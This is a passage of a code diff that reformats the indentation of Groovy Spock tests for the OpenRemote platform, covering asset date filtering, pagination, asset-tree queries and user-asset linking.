+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517238600000)))) // 29/01/2018 @ 3:10pm (UTC)
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "no assets should be returned"
+    assets.size() == 0
+
+    when: "a calendar event filtering query is executed inside a valid future event date and time"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517503800000)))) // 01/02/2018 @ 4:50pm (UTC))
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "the lobby and ground floor assets should be returned"
+    assets.size() == 2
+    assets.any {it.id == managerTestSetup.lobbyId}
+    assets.any {it.name == "Lobby"}
+    assets.any {it.id == managerTestSetup.groundFloorId}
+    assets.any {it.name == "Ground floor"}
+
+    when: "a calendar event filtering query is executed inside a valid future event date and time of the lobby asset"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1517849400000)))) // 05/02/2018 @ 4:50pm (UTC))
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "the lobby and ground floor assets should be returned"
+    assets.size() == 1
+    assets.any {it.id == managerTestSetup.lobbyId}
+    assets.any {it.name == "Lobby"}
+
+    when: "a calendar event filtering query is executed for some time after the last occurrence"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(new AttributePredicate(new StringPredicate("test"), new CalendarEventPredicate(new Date(1518017520000)))) // 02/07/2018 @ 3:32pm (UTC)
+            .orderBy(new OrderBy(NAME))
+            )
+
+    then: "no assets should be returned"
+    assets.size() == 0
+  }
+
+  def "DateTime queries"() {
+    when: "the lobby has an opening date and the date falls is between the filtering date"
+    def lobby = assetStorageService.find(managerTestSetup.lobbyId, true)
+    lobby.addAttributes(
+            new Attribute<>("openingDate", TIMESTAMP_ISO8601, Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).format(ISO_OFFSET_DATE_TIME)) // 28/01/2018 @ 2:00pm (UTC)
+            )
+    lobby = assetStorageService.merge(lobby)
+
+    def rangeStart = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).minusHours(2) // 28/01/2018 @ 1:00pm (UTC)
+    def rangeEnd = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()).plusHours(3) // 28/01/2018 @ 6:00pm (UTC)
+
+    def assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributeValue(
+                    "openingDate",
+                    new DateTimePredicate(rangeStart.format(ISO_OFFSET_DATE_TIME), rangeEnd.format(ISO_OFFSET_DATE_TIME))
+                    .operator(Operator.BETWEEN))
+            )
 
 
-        then: "the lobby asset should be retrieved"
-        assets.size() == 1
-        assets[0].id == lobby.id
+    then: "the lobby asset should be retrieved"
+    assets.size() == 1
+    assets[0].id == lobby.id
 
-        when: "the lobby has an opening date and the date is after the filtering date"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                    .attributeValue(
-                        "openingDate",
-                        new DateTimePredicate(Operator.GREATER_THAN, rangeStart.format(ISO_OFFSET_DATE_TIME)))
-        )
+    when: "the lobby has an opening date and the date is after the filtering date"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributeValue(
+                    "openingDate",
+                    new DateTimePredicate(Operator.GREATER_THAN, rangeStart.format(ISO_OFFSET_DATE_TIME)))
+            )
 
 
-        then: "the lobby asset should be retrieved"
-        assets.size() == 1
-        assets[0].id == lobby.id
+    then: "the lobby asset should be retrieved"
+    assets.size() == 1
+    assets[0].id == lobby.id
 
-        when: "the lobby has an opening date and the date is before the filtering date"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                    .attributeValue(
+    when: "the lobby has an opening date and the date is before the filtering date"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributeValue(
                     "openingDate",
                     new DateTimePredicate(Operator.LESS_THAN, rangeEnd.format(ISO_OFFSET_DATE_TIME)))
-        )
+            )
 
 
-        then: "the lobby asset should be retrieved"
-        assets.size() == 1
-        assets[0].id == lobby.id
+    then: "the lobby asset should be retrieved"
+    assets.size() == 1
+    assets[0].id == lobby.id
 
-        when: "the lobby has an opening date and the date is equal to the filtering date"
-        rangeStart = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()) // 28/01/2018 @ 2:00pm (UTC)
+    when: "the lobby has an opening date and the date is equal to the filtering date"
+    rangeStart = Instant.ofEpochMilli(1517151600000).atZone(ZoneId.systemDefault()) // 28/01/2018 @ 2:00pm (UTC)
 
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                    .attributeValue(
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributeValue(
                     "openingDate",
                     new DateTimePredicate(Operator.EQUALS, rangeStart.format(ISO_OFFSET_DATE_TIME)))
-        )
+            )
 
 
-        then: "the lobby asset should be retrieved"
-        assets.size() == 1
-        assets[0].id == lobby.id
-    }
+    then: "the lobby asset should be retrieved"
+    assets.size() == 1
+    assets[0].id == lobby.id
+  }
 
-    def "Limit and offset queries"() {
-        when: "a non limited query is executed to get all assets"
-        // We use this query to determine whether offsets and limits are working correctly
-        def allAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-        )
+  def "Limit and offset queries"() {
+    when: "a non limited query is executed to get all assets"
+    // We use this query to determine whether offsets and limits are working correctly
+    def allAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            )
 
-        then: "all assets should be returned"
-        allAssets.size() > 0
-        def allAssetsSize = allAssets.size()
+    then: "all assets should be returned"
+    allAssets.size() > 0
+    def allAssetsSize = allAssets.size()
 
-        when: "a query is executed with limit set to 0"
-        def zeroLimitAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .limit(0)
-        )
+    when: "a query is executed with limit set to 0"
+    def zeroLimitAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .limit(0)
+            )
 
-        then: "all assets should be returned"
-        zeroLimitAssets.size() == allAssetsSize
-        zeroLimitAssets.collect { it.id } == allAssets.collect { it.id }
+    then: "all assets should be returned"
+    zeroLimitAssets.size() == allAssetsSize
+    zeroLimitAssets.collect { it.id } == allAssets.collect { it.id }
 
-        when: "a query is executed with limit"
-        def limitedAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .limit(3)
-        )
+    when: "a query is executed with limit"
+    def limitedAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .limit(3)
+            )
 
-        then: "only 3 assets should be returned"
-        limitedAssets.size() == 3
-        limitedAssets.collect { it.id } == allAssets.take(3).collect { it.id }
+    then: "only 3 assets should be returned"
+    limitedAssets.size() == 3
+    limitedAssets.collect { it.id } == allAssets.take(3).collect { it.id }
 
-        when: "a query is executed with a higher limit"
-        def higherLimitAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .limit(5)
-        )
+    when: "a query is executed with a higher limit"
+    def higherLimitAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .limit(5)
+            )
 
-        then: "then  5 assets should be returned"
-        higherLimitAssets.size() == 5
+    then: "then  5 assets should be returned"
+    higherLimitAssets.size() == 5
 
-        when: "a query is executed with a offset"
-        def offsetAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .offset(2)
-        )
+    when: "a query is executed with a offset"
+    def offsetAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .offset(2)
+            )
 
-        then: "all assets after the offset should be returned"
-        offsetAssets.size() == allAssetsSize - 2
-        offsetAssets.collect { it.id } == allAssets.drop(2).collect { it.id }
+    then: "all assets after the offset should be returned"
+    offsetAssets.size() == allAssetsSize - 2
+    offsetAssets.collect { it.id } == allAssets.drop(2).collect { it.id }
 
-        and: "the first 2 assets from the all assets should not be present"
-        offsetAssets.collect { it.id } != allAssets.take(2).collect { it.id }
+    and: "the first 2 assets from the all assets should not be present"
+    offsetAssets.collect { it.id } != allAssets.take(2).collect { it.id }
 
-        when: "another query is executed with a offset and limit"
-        def offsetLimitAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .limit(2)
-                    .offset(3)
-        )
+    when: "another query is executed with a offset and limit"
+    def offsetLimitAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .limit(2)
+            .offset(3)
+            )
 
-        then: "the assets from the offset should be returned"
-        offsetLimitAssets.collect { it.id } == allAssets.drop(3).take(2).collect { it.id }
+    then: "the assets from the offset should be returned"
+    offsetLimitAssets.collect { it.id } == allAssets.drop(3).take(2).collect { it.id }
 
-        and: "the limit should be respected"
-        offsetLimitAssets.size() == 2
+    and: "the limit should be respected"
+    offsetLimitAssets.size() == 2
 
-        and: "the first 3 assets from the all assets should not be present"
-        offsetLimitAssets.collect { it.id } != allAssets.take(3).collect { it.id }
+    and: "the first 3 assets from the all assets should not be present"
+    offsetLimitAssets.collect { it.id } != allAssets.take(3).collect { it.id }
 
-        when: "a query is executed with an offset higher than the total number of assets"
-        def offsetHigherThanAssets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartBuildingId)
-                    .recursive(true)
-                    .orderBy(new OrderBy(NAME))
-                    .offset(allAssets.size() + 1)
-        )
+    when: "a query is executed with an offset higher than the total number of assets"
+    def offsetHigherThanAssets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartBuildingId)
+            .recursive(true)
+            .orderBy(new OrderBy(NAME))
+            .offset(allAssets.size() + 1)
+            )
 
-        then: "no assets should be returned"
-        offsetHigherThanAssets.size() == 0
-    }
+    then: "no assets should be returned"
+    offsetHigherThanAssets.size() == 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetTreeTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetTreeTest.groovy
@@ -42,213 +42,213 @@ import static org.openremote.model.Constants.*
 
 class AssetTreeTest extends Specification implements ManagerContainerTrait {
 
-    def "Get asset tree data via resource"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+  def "Get asset tree data via resource"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        and: "an authenticated user exists"
-        def accessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an authenticated user exists"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        and: "the asset resource is available"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    and: "the asset resource is available"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
 
-        when: "the asset tree is requested with a limit of 10 and offset of 0"
-        def assetTree = assetResource.queryAssetTree(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
-                        .limit(10)
-                        .offset(0)
-        )
+    when: "the asset tree is requested with a limit of 10 and offset of 0"
+    def assetTree = assetResource.queryAssetTree(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
+            .limit(10)
+            .offset(0)
+            )
 
-        then: "the asset tree should be returned"
-        assert assetTree != null
+    then: "the asset tree should be returned"
+    assert assetTree != null
 
-        and: "the asset tree should contain 10 assets"
-        assert assetTree.getAssets().size() == 10
+    and: "the asset tree should contain 10 assets"
+    assert assetTree.getAssets().size() == 10
 
-        and: "has more should be true, since there are more than 10 assets"
-        assert assetTree.hasMore() == true
+    and: "has more should be true, since there are more than 10 assets"
+    assert assetTree.hasMore() == true
 
-        when: "the next part of the asset tree is requested with a limit of 10 and offset of 10"
-        assetTree = assetResource.queryAssetTree(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
-                        .limit(10)
-                        .offset(10)
-        )
+    when: "the next part of the asset tree is requested with a limit of 10 and offset of 10"
+    assetTree = assetResource.queryAssetTree(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
+            .limit(10)
+            .offset(10)
+            )
 
-        then: "the asset tree should be returned"
-        assert assetTree != null
+    then: "the asset tree should be returned"
+    assert assetTree != null
 
-        and: "the asset tree should contain assets"
-        assert assetTree.getAssets().size() > 0
+    and: "the asset tree should contain assets"
+    assert assetTree.getAssets().size() > 0
 
-        and: "has more should be false, since there are no more assets to fetch"
-        assert assetTree.hasMore() == false
+    and: "has more should be false, since there are no more assets to fetch"
+    assert assetTree.hasMore() == false
 
-        when: "we get the asset tree to test the hasChildren flag"
-        assetTree = assetResource.queryAssetTree(null,
-                new AssetQuery()
-                        .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
-        )
+    when: "we get the asset tree to test the hasChildren flag"
+    assetTree = assetResource.queryAssetTree(null,
+            new AssetQuery()
+            .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
+            )
 
-        then: "the asset tree should be returned"
-        assert assetTree != null
-        assert assetTree.getAssets().size() > 0
+    then: "the asset tree should be returned"
+    assert assetTree != null
+    assert assetTree.getAssets().size() > 0
 
-        and: "the asset tree should contain assets"
-        assert assetTree.getAssets().size() > 0
+    and: "the asset tree should contain assets"
+    assert assetTree.getAssets().size() > 0
 
-        and: "the hasChildren flag should be set correctly"
-        def livingRoom1 = assetTree.getAssets().find { asset ->
-            asset.id == managerTestSetup.apartment1LivingroomId
-        }
-        if (livingRoom1) {
-            assert !livingRoom1.hasChildren()
-        }
-
-        def smartBuilding = assetTree.getAssets().find { asset ->
-            asset.id == managerTestSetup.smartBuildingId
-        }
-        if (smartBuilding) {
-            assert smartBuilding.hasChildren()
-        }
+    and: "the hasChildren flag should be set correctly"
+    def livingRoom1 = assetTree.getAssets().find { asset ->
+      asset.id == managerTestSetup.apartment1LivingroomId
+    }
+    if (livingRoom1) {
+      assert !livingRoom1.hasChildren()
     }
 
-    def "Get asset tree data via events"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def clientEventService = container.getService(ClientEventService.class)
-        def conditions = new PollingConditions(delay: 0.2, timeout: 5)
+    def smartBuilding = assetTree.getAssets().find { asset ->
+      asset.id == managerTestSetup.smartBuildingId
+    }
+    if (smartBuilding) {
+      assert smartBuilding.hasChildren()
+    }
+  }
+
+  def "Get asset tree data via events"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def clientEventService = container.getService(ClientEventService.class)
+    def conditions = new PollingConditions(delay: 0.2, timeout: 5)
 
 
-        when: "we subscribe to asset tree events"
-        List<SharedEvent> events = new CopyOnWriteArrayList<>()
-        Consumer<SharedEvent> eventConsumer = { assetTreeEvent ->
-            events.add(assetTreeEvent)
-        }
-        clientEventService.addSubscription(AssetTreeEvent.class, null, eventConsumer)
+    when: "we subscribe to asset tree events"
+    List<SharedEvent> events = new CopyOnWriteArrayList<>()
+    Consumer<SharedEvent> eventConsumer = { assetTreeEvent ->
+      events.add(assetTreeEvent)
+    }
+    clientEventService.addSubscription(AssetTreeEvent.class, null, eventConsumer)
 
-        then: "the subscription should be in place"
-        assert events.size() == 0
+    then: "the subscription should be in place"
+    assert events.size() == 0
 
-        when: "we send a read asset tree event"
-        def readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
+    when: "we send a read asset tree event"
+    def readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
             .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
             .limit(3))
 
-        // Set the response consumer
-        readAssetTreeEvent.setResponseConsumer({ event ->
-            clientEventService.publishEvent(event)
-        })
+    // Set the response consumer
+    readAssetTreeEvent.setResponseConsumer({ event ->
+      clientEventService.publishEvent(event)
+    })
 
-        // Publish the read asset tree event
-        clientEventService.publishEvent(readAssetTreeEvent)
+    // Publish the read asset tree event
+    clientEventService.publishEvent(readAssetTreeEvent)
 
-        def assetTree = null
+    def assetTree = null
 
-        then: "the asset tree event should be received"
-        conditions.eventually {
-            assert events.size() == 1
-            assert events.get(0) instanceof AssetTreeEvent
-            def assetTreeEvent = events.get(0) as AssetTreeEvent
-            assetTree = assetTreeEvent.getAssetTree()
-        }
+    then: "the asset tree event should be received"
+    conditions.eventually {
+      assert events.size() == 1
+      assert events.get(0) instanceof AssetTreeEvent
+      def assetTreeEvent = events.get(0) as AssetTreeEvent
+      assetTree = assetTreeEvent.getAssetTree()
+    }
 
-        and: "the asset tree should contain 3 assets"
-        assert assetTree.getAssets().size() == 3
+    and: "the asset tree should contain 3 assets"
+    assert assetTree.getAssets().size() == 3
 
-        and: "the hasMore flag should be true since there are more assets to fetch"
-        assert assetTree.hasMore() == true
+    and: "the hasMore flag should be true since there are more assets to fetch"
+    assert assetTree.hasMore() == true
 
-        events.clear() // Clear the events list
+    events.clear() // Clear the events list
 
-        when: "we send a read asset tree event with a limit of 3 and offset of 3"
-        readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
+    when: "we send a read asset tree event with a limit of 3 and offset of 3"
+    readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
             .realm(new RealmPredicate(managerTestSetup.realmBuildingName))
             .limit(3)
             .offset(3))
 
-        // Set the response consumer
-        readAssetTreeEvent.setResponseConsumer({ event ->
-            clientEventService.publishEvent(event)
-        })
+    // Set the response consumer
+    readAssetTreeEvent.setResponseConsumer({ event ->
+      clientEventService.publishEvent(event)
+    })
 
-        // Publish the read asset tree event
-        clientEventService.publishEvent(readAssetTreeEvent)
+    // Publish the read asset tree event
+    clientEventService.publishEvent(readAssetTreeEvent)
 
-        def assetTree2 = null
+    def assetTree2 = null
 
-        then: "the asset tree event should be received"
-        conditions.eventually {
-            assert events.size() == 1
-            assert events.get(0) instanceof AssetTreeEvent
-            def assetTreeEvent = events.get(0) as AssetTreeEvent
-            assetTree2 = assetTreeEvent.getAssetTree()
-        }
+    then: "the asset tree event should be received"
+    conditions.eventually {
+      assert events.size() == 1
+      assert events.get(0) instanceof AssetTreeEvent
+      def assetTreeEvent = events.get(0) as AssetTreeEvent
+      assetTree2 = assetTreeEvent.getAssetTree()
+    }
 
-        and: "the asset tree should contain 3 assets"
-        assert assetTree2.getAssets().size() == 3
+    and: "the asset tree should contain 3 assets"
+    assert assetTree2.getAssets().size() == 3
 
-        and: "the hasMore flag should be true since there are more assets to fetch"
-        assert assetTree2.hasMore() == true
+    and: "the hasMore flag should be true since there are more assets to fetch"
+    assert assetTree2.hasMore() == true
 
-        events.clear() // Clear the events list
+    events.clear() // Clear the events list
 
-        when: "we send a read asset tree event to test the hasChildren flag"
-        readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
+    when: "we send a read asset tree event to test the hasChildren flag"
+    readAssetTreeEvent = new ReadAssetTreeEvent(new AssetQuery()
             .realm(new RealmPredicate(managerTestSetup.realmBuildingName)))
 
-        // Set the response consumer
-        readAssetTreeEvent.setResponseConsumer({ event ->
-            clientEventService.publishEvent(event)
-        })
+    // Set the response consumer
+    readAssetTreeEvent.setResponseConsumer({ event ->
+      clientEventService.publishEvent(event)
+    })
 
-        // Publish the read asset tree event
-        clientEventService.publishEvent(readAssetTreeEvent)
+    // Publish the read asset tree event
+    clientEventService.publishEvent(readAssetTreeEvent)
 
-        def assetTree3 = null
+    def assetTree3 = null
 
-        then: "the asset tree event should be received with correct hasChildren flags"
-        conditions.eventually {
-            assert events.size() == 1
-            assert events.get(0) instanceof AssetTreeEvent
-            def assetTreeEvent = events.get(0) as AssetTreeEvent
-            assetTree3 = assetTreeEvent.getAssetTree()
-            assert assetTree3.getAssets().size() > 0
+    then: "the asset tree event should be received with correct hasChildren flags"
+    conditions.eventually {
+      assert events.size() == 1
+      assert events.get(0) instanceof AssetTreeEvent
+      def assetTreeEvent = events.get(0) as AssetTreeEvent
+      assetTree3 = assetTreeEvent.getAssetTree()
+      assert assetTree3.getAssets().size() > 0
 
-            and: "the asset tree should contain assets"
-            assert assetTree3.getAssets().size() > 0
+      and: "the asset tree should contain assets"
+      assert assetTree3.getAssets().size() > 0
 
-            and: "the hasMore flag should be false since we queried without a limit"
-            assert assetTree3.hasMore() == false
+      and: "the hasMore flag should be false since we queried without a limit"
+      assert assetTree3.hasMore() == false
 
 
-            and: "the hasChildren flag should be set correctly"
-            // Check hasChildren flag for a room asset (should not have children)
-            def livingRoom1 = assetTree3.getAssets().find { asset ->
-                asset.id == managerTestSetup.apartment1LivingroomId
-            }
-            if (livingRoom1) {
-                assert !livingRoom1.hasChildren()
-            }
+      and: "the hasChildren flag should be set correctly"
+      // Check hasChildren flag for a room asset (should not have children)
+      def livingRoom1 = assetTree3.getAssets().find { asset ->
+        asset.id == managerTestSetup.apartment1LivingroomId
+      }
+      if (livingRoom1) {
+        assert !livingRoom1.hasChildren()
+      }
 
-            // Check hasChildren flag for a building asset (should have children)
-            def smartBuilding = assetTree3.getAssets().find { asset ->
-                asset.id == managerTestSetup.smartBuildingId
-            }
-            if (smartBuilding) {
-                assert smartBuilding.hasChildren()
-            }
-        }
+      // Check hasChildren flag for a building asset (should have children)
+      def smartBuilding = assetTree3.getAssets().find { asset ->
+        asset.id == managerTestSetup.smartBuildingId
+      }
+      if (smartBuilding) {
+        assert smartBuilding.hasChildren()
+      }
     }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetUserLinkingTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetUserLinkingTest.groovy
@@ -36,187 +36,187 @@ import static org.openremote.model.util.MapAccess.getString
 
 class AssetUserLinkingTest extends Specification implements ManagerContainerTrait {
 
-    def "Link assets and users as superuser"() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def timerService = container.getService(TimerService.class)
-        def identityService = container.getService(ManagerIdentityService.class)
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+  def "Link assets and users as superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def timerService = container.getService(TimerService.class)
+    def identityService = container.getService(ManagerIdentityService.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
 
-        and: "an authenticated admin user"
-        def accessTokenString = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    and: "an authenticated admin user"
+    def accessTokenString = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        and: "the asset resource"
-        def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessTokenString).proxy(AssetResource.class)
-        /* ############################################## READ ####################################### */
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessTokenString).proxy(AssetResource.class)
+    /* ############################################## READ ####################################### */
 
-        and: "user access tokens"
-        def testUserAccessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "testuser1", "testuser1")
-        def testUser1Token = identityService.verify(MASTER_REALM, testUserAccessToken)
+    and: "user access tokens"
+    def testUserAccessToken = authenticate(container, MASTER_REALM, KEYCLOAK_CLIENT_ID, "testuser1", "testuser1")
+    def testUser1Token = identityService.verify(MASTER_REALM, testUserAccessToken)
 
-        testUserAccessToken = authenticate(container, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID, "testuser2", "testuser2")
-        def testUser2Token = identityService.verify(keycloakTestSetup.realmBuilding.name, testUserAccessToken)
+    testUserAccessToken = authenticate(container, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID, "testuser2", "testuser2")
+    def testUser2Token = identityService.verify(keycloakTestSetup.realmBuilding.name, testUserAccessToken)
 
-        testUserAccessToken = authenticate(container, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID, "testuser3", "testuser3")
-        def testUser3Token = identityService.verify(keycloakTestSetup.realmBuilding.name, testUserAccessToken)
+    testUserAccessToken = authenticate(container, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID, "testuser3", "testuser3")
+    def testUser3Token = identityService.verify(keycloakTestSetup.realmBuilding.name, testUserAccessToken)
 
-        expect: "some users to be restricted"
-        !identityService.getIdentityProvider().isRestrictedUser(testUser1Token)
-        !identityService.getIdentityProvider().isRestrictedUser(testUser2Token)
-        identityService.getIdentityProvider().isRestrictedUser(testUser3Token)
+    expect: "some users to be restricted"
+    !identityService.getIdentityProvider().isRestrictedUser(testUser1Token)
+    !identityService.getIdentityProvider().isRestrictedUser(testUser2Token)
+    identityService.getIdentityProvider().isRestrictedUser(testUser3Token)
 
-        when: "all user assets are retrieved of a realm"
-        def userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, null, null)
+    when: "all user assets are retrieved of a realm"
+    def userAssetLinks = assetResource.getUserAssetLinks(null, keycloakTestSetup.realmBuilding.name, null, null)
 
-        then: "result should match"
-        userAssetLinks.length == 13
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1Id &&
-                    it.assetName == "Apartment 1" &&
-                    it.parentAssetName == "Smart building" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
-                    it.id.assetId == managerTestSetup.apartment1LivingroomId &&
-                    it.assetName == "Living Room 1" &&
-                    it.parentAssetName == "Apartment 1" &&
-                    it.userFullName == "testuser3 (DemoA3 DemoLast)"
-        }
-        userAssetLinks.any {
-            it.id.realm == keycloakTestSetup.realmBuilding.name &&
-                    it.id.userId == keycloakTestSetup.testuser3Id &&
